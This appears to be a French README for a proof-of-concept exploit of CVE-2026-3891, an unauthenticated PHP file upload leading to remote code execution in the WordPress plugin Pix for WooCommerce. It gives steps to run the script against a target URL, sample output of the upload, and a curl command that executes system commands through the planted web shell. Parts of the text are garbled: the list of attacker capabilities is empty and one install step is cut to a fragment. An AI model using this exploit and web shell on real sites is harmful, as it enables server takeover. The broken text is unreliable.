
PoC pour CVE-2026-3891 — Téléversement arbitraire de fichiers sans authentification menant à une exécution de code à distance dans Pix for WooCommerce <= 1.5.0
CVE-2026-3891 est une vulnérabilité critique de téléversement arbitraire de fichier sans authentification présente dans le plugin WordPress Pix for WooCommerce dans les versions jusqu'à la 1.5.0 incluse.
La vulnérabilité existe dans la fonctionnalité lkn_pix_for_woocommerce_c6_save_settings en raison de l'absence de contrôles d'autorisation et d'une validation insuffisante du type de fichier. L'exploit automatise le processus d'obtention d'un nonce valide et de démonstration du téléversement sans restriction d'un fichier PHP vers un répertoire accessible via le web.
En exploitant cette vulnérabilité, un attaquant non authentifié peut être en mesure de :
pip install requests
CVE-2026-3891.py sur votre système.python CVE-2026-3891.py
Saisissez l'URL WordPress cible lorsque vous y êtes invité :
[?] Enter target URL: http://localhost/wordpress
Exemple :
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...
[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
